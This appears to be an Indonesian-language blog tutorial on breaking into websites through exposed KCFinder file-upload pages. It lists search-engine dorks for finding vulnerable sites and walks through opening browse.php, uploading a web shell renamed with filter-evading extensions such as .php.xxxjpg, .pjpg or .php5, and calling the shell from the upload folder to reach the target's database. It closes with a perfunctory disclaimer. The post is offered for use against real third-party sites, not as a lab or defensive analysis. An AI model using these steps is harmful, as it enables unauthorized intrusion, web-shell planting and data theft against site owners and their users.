pertama kita siapkan dulu dorknya
inurl:/kcfinder
inurl:/kcfinder site:(isi nama domain)
inurl:/ckeditor/kcfinder
inurl:/modules/
inurl:/plugins
pilih salah satu, jan lupa kembangin sendiri biar joss
cari targetnya, setelah dapat targetnya langsung saja exploit http://site.co.li/path/kcfinder/browse.php
setelah muncul seperti itu, baru olah anda upload shell kesayangan anda, shel bisa berformat .php.xxxjpg, .php,.pjpg, .php5 atau juga yang lainya
setelah upload shell barulah kita panggil shell kita dengan http://site.co.li/path/kcfinder/upload/files/namashellmu
dan tara.... kita sudah masuk kedalam daabase target, mau diapakan terselah kalian yang penting kamu bahagia...
sekian tutorial dari saya, jangan di salah gunakan, saya tidak akan bertanggung jawab atas apa yang terjadi setelah ini, resiko di tanggung pemenang..
Post a Comment
Post a Comment